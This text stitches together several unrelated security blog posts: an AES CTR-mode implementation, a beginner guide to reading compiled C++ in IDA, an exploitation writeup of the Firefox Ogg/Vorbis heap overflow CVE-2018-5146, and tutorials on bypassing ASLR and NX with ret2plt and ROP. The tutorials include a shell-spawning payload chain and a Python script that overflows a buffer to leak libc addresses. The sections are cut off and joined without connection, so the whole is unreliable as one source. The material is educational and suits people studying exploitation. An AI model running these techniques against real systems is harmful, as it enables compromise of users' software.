The concept of CTR mode which turns a block cipher into a stream cipher was first proposed by Whitfield Diffie and Martin Hellman in their 1979 publication, Privacy and Authentication: An Introduction to Cryptography.

CTR mode works by encrypting a nonce and counter, then using the ciphertext to encrypt our plain text using a simple XOR operation. Since AES encrypts 16-byte blocks, a counter can be 8-bytes, and a nonce 8-bytes.

The following is a very simple implementation of this mode using the AES-128 implementation.

// encrypt using Counter (CTR) mode
void encrypt(W len, B *ctr, B *in, B *key){
    W i,r;
    B t[32];

    // copy master key to local buffer
    F(16)t[i+16]=key[i];

    while(len){
      // copy counter+nonce to local buffer
      F(16)t[i]=ctr[i];
      
      // encrypt t
      E(t);
      
      // XOR plaintext with ciphertext
      r=len>16?16:len;
      F(r)in[i]^=t[i];
      
      // update length + position
      len-=r;in+=r;
      
      // update counter
      for(i=15;i>=0;i--)
        if(++ctr[i])break;
    }
}

In assembly

; void encrypt(W len, B *ctr, B *in, B *key)
_encrypt:
    pushad
    lea    esi,[esp+32+4]
    lodsd
    xchg   eax, ecx          ; ecx = len
    lodsd
    xchg   eax, ebp          ; ebp = ctr
    lodsd
    xchg   eax, edx          ; edx = in
    lodsd
    xchg   esi, eax          ; esi = key
    pushad                   ; alloca(32)
; copy master key to local buffer
; F(16)t[i+16]=key[i];
    lea    edi, [esp+16]     ; edi = &t[16]
    movsd
    movsd
    movsd
    movsd
aes_l0:
    xor    eax, eax
    jecxz  aes_l3            ; while(len){
; copy counter+nonce to local buffer
; F(16)t[i]=ctr[i];
    mov    edi, esp          ; edi = t
    mov    esi, ebp          ; esi = ctr
    push   edi
    movsd
    movsd
    movsd
    movsd
; encrypt t    
    call   _E                ; E(t)
    pop    edi
aes_l1:
; xor plaintext with ciphertext
; r=len>16?16:len;
; F(r)in[i]^=t[i];
    mov    bl, [edi+eax]     ; 
    xor    [edx], bl         ; *in++^=t[i];
    inc    edx               ; 
    inc    eax               ; i++
    cmp    al, 16            ;
    loopne aes_l1            ; while(i!=16 && --ecx!=0)
; update counter
    xchg   eax, ecx          ; 
    mov    cl, 16
aes_l2:
    inc    byte[ebp+ecx-1]   ;
    loopz  aes_l2            ; while(++c[i]==0 && --ecx!=0)
    xchg   eax, ecx
    jmp    aes_l0
aes_l3:
    popad
    popad
    ret

Summary

The final assembly code for ECB mode is 205 bytes, and 272 for CTR mode.

Check sources here.

Reverse Engineering Basic Programming Concepts

Reverse Engineering

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to BOn the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, This article series will not cover the basics of assembly, it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code.

Throughout this article we will cover:

  1. Variable Initiation
  2. Basic Output
  3. Mathematical Operations
  4. Functions
  5. Loops (For loop / While loop)
  6. Conditional Statements (IF Statement / Switch Statement)
  7. User Input

please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.


Variable Initiation

Variables are extremely important when programming, here we can see a few important variables:

  1. a string
  2. an int
  3. a boolean
  4. a char
  5. a double
  6. a float
  7. a char array
Basic Variables

Please note: In C++, ‘string’ is not a primitive variable but I thought it important to show you anyway.

Now, lets take a look at the assembly:

Initiating Variables

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them.

Initializing Variables

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

C++ String Initiation

As you can see, initiating a string requires a call to a built in function for initiation.

Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Basic Output

Now, let’s take a look at the assembly:

First, the string literal:

String Literal Output

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

Variable Output

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

  1. Addition
  2. Subtraction
  3. Multiplication
  4. Division
  5. Bitwise AND
  6. Bitwise OR
  7. Bitwise XOR
  8. Bitwise NOT
  9. Bitwise Right-Shift
  10. Bitwise Left-Shift
Mathematical Functions Code

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and to hex 0F, which represents decimal 15.

Variable Setting

We add by using the ‘add’ opcode:

Addition

We subtract using the ‘sub’ opcode:

Subtraction

We multiply using the ‘imul’ opcode:

Multiplication

We divide using the ‘idiv’ opcode. In this case, we also use the ‘cdq’ to double the size of EAX so that we can fit the output of the division operation.

Division

We perform the Bitwise AND using the ‘and’ opcode:

Bitwise AND

We perform the Bitwise OR using the ‘or’ opcode:

Bitwise OR

We perform the Bitwise XOR using the ‘xor’ opcode:

Bitwise XOR

We perform the Bitwise NOT using the ‘not’ opcode:

Bitwise NOT

We peform the Bitwise Right-Shift using the ‘sar’ opcode:

Bitwise Right-Shift

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

Bitwise Left-Shift

Function Calls

In this section, we’ll be looking at 3 different types of functions:

  1. a basic void function
  2. a function that returns an integer
  3. a function that takes in parameters

Calling Functions

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

Calling Functions Without Parameters

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

The newfunc() Function Code
The newfunc() Function

As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer.

The newfuncret() Function Code
The newfuncret() function

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value into the EAX register. Next, the EAX variable is moved into the A variable space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call function and what it looks like when a function returns something, let’s talk about calling functions with parameters:

First, let’s take another look at the call statement:

Calling a Function with Parameters in C++
Calling a Function with Parameters

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First ,you move the variable into a register, then you push the registers on the stack, then you call the function.

Let’s take a look at the function’s code:

The funcparams() Function Code
The funcparams() Function

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy.

Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

For Loop Code
A graphical Overview of the For Loop

Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has 2 options; It can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

Detailed For Loop

First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the maxvariable, we continue down to the left and print out the i variable then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.

Now, let’s take a look at a while loop:

While Loop Code
While Loop

In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!” otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.

If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

IF Statement Code

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.

Now, let’s take a look at the assembly graph:

IF Statement Assembly Graph

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. IF we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A which represents decimal 10. This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

Switch Statement Code

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. IfA is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.

Now, let’s take a look at the assembly graph:

Switch Case Assembly Graph

Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule, instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Le’ts first take a look at the initial 2 boxes:

The First 2 Graph Sections

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

User Input Code

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.

Le’ts break this down into assembly. First, the C++ cin part:

C++ cin

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

The C++ cin Function Upclose

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function which is then called and has it’s output moved into ECX, which is then put on the stack for the printf statement:

User Input printf Statement

Thanks!

Writeup for CVE-2018-5146 or How to kill a (Fire)fox – en

1. Debug Environment

  • OS
    • Windows 10
  • Firefox_Setup_59.0.exe
    • SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
  • Xul.dll
    • SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Infomation

The issue in Mozilla’s Bugzilla is Bug 1446062.
The vulnerability used in pwn2own 2018 is assigned with CVE-2018-5146.
From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In next section, I will introduce some base information of this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation.
One “Ogg file” consist of some “Ogg Page” and one “Ogg Page” contains one Ogg Header and one Segment Table.
The structure of Ogg Page can be illustrate as follow picture.

Pic.1 Ogg Page Structure

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation.
In a Ogg file, data relative to Vorbis will be encapsulated into Segment Table inside of Ogg Page.
One MIT document show the process of encapsulation.

3.2.1. Vorbis Header

In Vorbis, there are three kinds of Vorbis Header. For one Vorbis bitstream, all three kinds of Vorbis header shound been set. And those Header are:

  • Vorbis Identification Header
    Basically define Ogg bitstream is in Vorbis format. And it contains some information such as Vorbis version, basic audio information relative to this bitstream, include number of channel, bitrate.
  • Vorbis Comment Header
    Basically contains some user define comment, such as Vendor infomation。
  • Vorbis Setup Header
    Basically contains information use to setup codec, such as complete VQ and Huffman codebooks used in decode.
3.2.2. Vorbis Identification Header

Vorbis Identification Header structure can be illustrated as follow:

Pic.2 Vorbis Identification Header Structure

3.2.3. Vorbis Setup Header

Vorbis Setup Heade Structure is more complicate than other headers, it contain some substructure, such as codebooks.
After “vorbis” there was the number of CodeBooks, and following with CodeBook Objcet corresponding to the number. And next was TimeBackends, FloorBackends, ResiduesBackends, MapBackends, Modes.
Vorbis Setup Header Structure can be roughly illustrated as follow:

Pic.3 Vorbis Setup Header Structure

3.2.3.1. Vorbis CodeBook

As in Vorbis spec, a CodeBook structure can be represent as follow:

byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header, there was a length_table array which length equal to codebook_entries. Element of this array can be 5 bit or 6 bit long, base on the flag.
Following as VQ-relative structure:

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits and plus one
[codebook_sequence_p] 1 bits

Finally was a VQ-table array with length equal to codebook_dimensions * codebook_entrue,element length Corresponding to codebood_value_bits.
Codebook_minimum_value and codebook_delta_value will be represent in float type, but for support different platform, Vorbis spec define a internal represent format of “float”, then using system math function to bake it into system float type. In Windows, it will be turn into double first than float.
All of above build a CodeBook structure.

3.2.3.2. Vorbis Time

In nowadays Vorbis spec, this data structure is nothing but a placeholder, all of it data should be zero.

3.2.3.3. Vorbis Floor

In recent Vorbis spec, there were two different FloorBackend structure, but it will do nothing relative to vulnerability. So we just skip this data structure.

3.2.3.4. Vorbis Residue

In recent Vorbis spec, there were three kinds of ResidueBackend, different structure will call different decode function in decode process. It’s structure can be presented as follow:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits and plus one
[residue_classifications] = 6 bits and plus one
[residue_classbook] 8 bits

The residue_classbook define which CodeBook will be used when decode this ResidueBackend.
MapBackend and Mode dose not have influence to exploit so we skip them too.

4. Patch analysis

4.1. Patched Function

From blog of ZDI, we can see vulnerability inside following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
{
if (book->used_entries > 0)
{
int i, j, entry;
float *t;

if (book->dim > 8)
{
for (i = 0; i < n;) {
entry = decode_packed_entry_number(book, b);
if (entry == -1) return (-1);
t = book->valuelist + entry * book->dim;
for (j = 0; j < book->dim;)
{
a[i++] += t[j++];
}
}
else
{
// blablabla
}
}
return (0);
}

Inside first if branch, there was a nested loop. Inside loop use a variable “book->dim” without check to stop loop, but it also change a variable “i” come from outer loop. So if ”book->dim > n”, “a[i++] += t[j++]” will lead to a out-of-bound-write security issue.

In this function, “a” was one of the arguments, and t was calculate from “book->valuelist”.

4.2. Buffer – a

After read some source , I found “a” was initialization in below code:

    /* alloc pcm passback storage */
vb->pcmend=ci->blocksizes[vb->W];
vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
for(i=0;ichannels;i++)
vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

The “vb->pcm[i]” will be pass into vulnerable function as “a”, and it’s memory chunk was alloc by _vorbis_block_alloc with size equal to vb->pcmend*sizeof(*vb->pcm[i]).
And vb->pcmend come from ci->blocksizes[vb->W], ci->blocksizes was defined in Vorbis Identification Header.
So we can control the size of memory chunk alloc for “a”.
Digging deep into _vorbis_block_alloc, we can found this call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” was lie on mozJemalloc heap.

4.3. Buffer – t

After read some source code , I found book->valuelist get its value from here:

    c->valuelist=_book_unquantize(s,n,sortindex);

And the logic of _book_unquantize can be show as follow:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
{
long j, k, count = 0;
if (b->maptype == 1 || b->maptype == 2)
{
int quantvals;
float mindel = _float32_unpack(b->q_min);
float delta = _float32_unpack(b->q_delta);
float *r = _ogg_calloc(n * b->dim, sizeof(*r));

switch (b->maptype)
{
case 1:

quantvals=_book_maptype1_quantvals(b);

// do some math work

break;
case 2:

float val=b->quantlist[j*b->dim+k];

// do some math work

break;
}

return (r);
}
return (NULL);
}

So book->valuelist was the data decode from corresponding CodeBook’s VQ data.
It was lie on mozJemalloc heap too.

4.4. Cola Time

So now we can see, when the vulnerability was triggered:

  • a
    • lie on mozJemalloc heap;
    • size controllable.
  • t
    • lie on mozJemalloc heap too;
    • content controllable.
  • book->dim
    • content controllable.

Combine all thing above, we can do a write operation in mozJemalloc heap with a controllable offset and content.
But what about size controllable? Can this work for our exploit? Let’s see how mozJemalloc work.

5. mozJemalloc

mozJemalloc is a heap manager Mozilla develop base on Jemalloc.
Following was some global variables can show you some information about mozJemalloc.

  • gArenas
    • mDefaultArena
    • mArenas
    • mPrivateArenas
  • gChunkBySize
  • gChunkByAddress
  • gChunkRTress

In mozJemalloc, memory will be divide into Chunks, and those chunk will be attach to different Arena. Arena will manage chunk. User alloc memory chunk must be inside one of the chunks. In mozJemalloc, we call user alloc memory chunk as region.
And Chunk will be divide into run with different size.Each run will bookkeeping region status inside it through a bitmap structure.

5.1. Arena

In mozJemalloc, each Arena will be assigned with a id. When allocator need to alloc a memory chunk, it can use id to get corresponding Arena.
There was a structure call mBin inside Arena. It was a array, each element of it wat a arena_bin_t object, and this object manage all same size memory chunk in this Arena. Memory chunk size from 0x10 to 0x800 will be managed by mBin.
Run used by mBin can not be guarantee to be contiguous, so mBin using a red-black-tree to manage Run.

5.2. Run

The first one region inside a Run will be use to save Run manage information, and rest of the region can be use when alloc. All region in same Run have same size.
When alloc region from a Run, it will return first No-in-use region close to Run header.

5.3. Arena Partition

This now code branch in mozilla-central, all JavaScript memory alloc or free will pass moz_arena_ prefix function. And this function will only use Arena which id was 1.
In mozJemalloc, Arena can be a PrivateArena or not a PrivateArena. Arena with id 1 will be a PrivateArena. So it means that ogg buffer will not be in the same Arena with JavaScript Object.
In this situation, we can say that JavaScript Arena was isolated with other Arenas.
But in vulnerable Windows Firefox 59.0 does not have a PrivateArena, so that we can using JavaScript Object to perform a Heap feng shui to run a exploit.
First I was debug in a Linux opt+debug build Firefox, as Arena partition, it was hard to found a way to write a exploit, so far I can only get a info leak situation in Linux.

6. Exploit

In the section, I will show how to build a exploit base on this vulnerability.

6.1. Build Ogg file

First of all, we need to build a ogg file which can trigger this vulnerability, some of PoC ogg file data as follow:

Pic.4 PoC Ogg file partial data
We can see codebook->dim equal to 0x48。

6.2. Heap Spary

First we alloc a lot JavaScript avrray, it will exhaust all useable memory region in mBin, and therefore mozJemalloc have to map new memory and divide it into Run for mBin.
Then we interleaved free those array, therefore there will be many hole inside mBin, but as we can never know the original layout of mBin, and there can be other object or thread using mBin when we free array, the hole may not be interleaved.
If the hole is not interleaved, our ogg buffer may be malloc in a contiguous hole, in this situation, we can not control too much off data.
So to avoid above situation, after interleaved free, we should do some compensate to mBin so that we can malloc ogg buffer in a hole before a array.

6.3. Modify Array Length

After Heap Spary,we can use _ogg_malloc to malloc region in mozJemalloc heap.
So we can force a memory layout as follow:

|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

And we trigger a out-of-bound write operation, we can modify one of the array’s length. So that we have a array object in mozJemalloc which can read out-of-bound.
Then we alloc many ArrayBuffer Object in mozJemalloc. Memory layout turn into following situation:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents.
Finally memory will like this:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control those object and we can do:

  • Array_length_modified
    • Out-of-bound write
    • Out-of-bound read
  • ArrayBuffer_contents_modified
    • In-bound write
    • In-bound read

If we try to leak memory data from Array_length_modified, due to SpiderMonkey use tagged value, we will read “NaN” from memory.
But if we use Array_length_modified to write something in ArrayBuffer_contents_modified, and read it from ArrayBuffer_contents_modified. We can leak pointer of Javascript Object from memory.

6.5. Fake JSObject

We can fake a JSObject on memory by leak some pointer and write it into JavasScript Object. And we can write to a address through this Fake Object. (turn off baselineJIT will help you to see what is going on and following contents will base on baselineJIT disable)

Pic.5 Fake JavaScript Object

If we alloc two arraybuffer with same size, they will in contiguous memory inside JS::Nursery heap. Memory layout will be like follow

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

And we can change first arraybuffer’s metadata to make SpiderMonkey think it cover second arraybuffer by use fake object trick.

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

We can read/write to arbitrarily memory now.
After this, all you need was a ROP chain to get Firefox to your shellcode.

6.6. Pop Calc?

Finally we achieve our shellcode, process context as follow:

Pic.6 achieve shellcode
Corresponding memory chunk information as follow:

Pic.7 memory address information

But Firefox release have enable Sandbox as default, so if you try to pop calc through CreateProcess, Sandbox will block it.

7. Relative code and works

  1. Firefox Source Code
  2. OR’LYEH? The Shadow over Firefox by argp
  3. Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp,haku
  4. QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi

 

Bypass ASLR+NX Part 1

Hi guys today i will explain how to bypass ASLR and NX mitigation technique if you dont have any knowledge about ASLR and NX you can read it in Above link i will explain it but not in depth

ASLR:Address Space Layout randomization : it’s mitigation to technique to prevent exploitation of memory by make Address randomize not fixed as we saw in basic buffer overflow exploit it need to but start of buffer in EIP and Redirect execution to execute your shellcode but when it’s random it will make it hard to guess that start of buffer random it’s only in shared library address we found ASLR in stack address ,Heap Address.

NX: Non-Executable it;s another mitigation use to prevent memory from execute any machine code(shellcode) as we saw in basic buffer overflow  you  put shellcode in stack and redirect EIP to begin of buffer to execute it but this will not work here this mitigation could be bypass by Ret2libc exploit technique use function inside binary pass it to stack and aslo they are another way   depend on gadgets inside binary or shared library this technique is ROP Return Oriented Programming i will  make separate article .

After we get little info about ASLR and NX now it’s time to see how we can bypass it, to bypass ASLR there are many ways like Ret2PLT use Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(func@PLT) why we use Return in PLT because it’not randomized  it’s address know before execution itself  another technique is overwrite GOT and  brute-forcing this technique use when the address partial randomized like 2 or 3 bytes just randomized .

in this article i will explain technique combine Ret2plt and some ROP gadgets and Ret2libc see let divided it
first find Ret2PLT

vulnerable code

we compile it with following Flags

now let check ASLR it’s enable it

 

as you see in above image libc it’s randomized but it could be brute-force it

now let open file in gdb

now it’s clear NX was enable it now let fuzzing binary .

we create pattern and we going to pass to  binary  to detect where overflow occur

 

 

now we can see they are pattern in EIP we use another tool to find where overflow occurred.

1028 to overwrite EBP if we add 4bytes we going control EIP and we can redirect our execution.

 

now we have control EIP .

ok after we do basic overflow steps now we need way let us to bypass ASLR+NX .

first find functions PLT in binary file.

we find strcpy and system PLT now how we going to build our exploit depend on two methods just.
second we must find writable section in binary file to fill it and use system like to we did in traditional Ret2libc.

first think in .bss section is use by compilers and linkers for the  part  of the data segment containing static allocated variables that are not initialized .

after that we will use strcpy to write string in .bss address but what address ?
ok let back to function we find it in PLT strcpy as we know we will be use to write string and system to execute command but will can;t find /bin/sh in binary file we have another way is to look at binary.

now we have string address  it’s time to combine all pieces we found it.

1-use strcpy to copy from SRC to DEST SRC in this case it’s our string «sh» and DEST   it’s our writable area «.bss» but we need to chain two method strcpy and system we look for gadgets depend on our parameters in this case just we need pop pop ret.

we chose 0x080484ba does’t matter  register name  we need just two pop .
2-after we write string  we use system like we use it in Ret2libc but in this case «/bin/sh» will be .bss address.

final payload

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dump+.bss

Final Exploit

 

we got Shell somtime you need to chain many technique to get final exploit to bypass more than one mitigation.

64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

